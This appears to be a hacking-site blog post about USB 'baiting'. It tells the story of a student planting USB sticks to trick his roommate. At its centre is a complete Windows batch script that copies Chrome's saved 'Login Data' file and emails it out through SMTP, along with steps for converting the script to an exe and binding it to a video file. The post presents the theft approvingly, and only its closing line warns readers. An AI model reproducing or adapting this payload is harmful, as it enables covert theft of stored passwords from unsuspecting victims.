Well-known Social Engineering Ways

A brilliant engineer would hack out a smart solution to the problem at hand, and consider it a compliment to be called a hacker.  – For more reads please read the article Hack to live at http://schoolforhackers.com/category/hacking-tools/. The sure thing is; you find the way to get what you want to have. Let’s talk about a well-known social engineering way out of 5 here we would like to discuss.

  1. Baiting

               This way is named as baiting allegorically. It is similar to phishing (fishing) attack. The items or goods, a hacker use to entice victims distinguish them from other types of social engineering. Baiters focus on human curiosity via the use of physical media and they might offer users free audio and movie downloads.

Race Start

Min Mg Mg put some USB sticks around his roommates’ desks and practical room. One of his roommates picks up a USB Stick and was really curious to open it on his laptop then he opened. “Wow, many audios here, and videos as well, that’s really luck. Look, this video is interesting its name is “Myself”, let’s check it out the video to know whose USB stick is this.” He was muttering when he opened the video. “Grandpa, I put a video file that hooked with a barb; a batch file –

@echo off

color 08

mkdir \a  C:\Users\%username%\Documents\sm

move /Y sendEmail.exe C:\Users\%username%\Documents\sm

PATH=%path%; C:\Users\%username%\Documents\sm

cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\

xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C

cd C:\Users\%username%\Documents\

copy  /Y “Login Data” LoginData

cd  C:\Users\%username%\Documents\sm\

sendEmail -f from@gmail.com -u subject -m Message Body  -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes

start http://www.animateit.net/data/media/feb2013/love_roses_03.gif

 

with the playful windows script and it’s converted as a exe using bat to exe converter. I bound it with a Video file and sendEmail.exe files. Sooner I might have the Login Data file from his Google Chrome. When I put the Login Data to my Chrome profile I’ll see his saved password, if he saved his password on his browser.” Min Mg Mg said to grandpa when he was staring at his screen.

Race End            

Of course, we should be curious for the happiness of getting a USB on the street. You might want to keep in mind there are attackers out there who are doing these attack on purposes, even if the mentioned script is an amateur window script.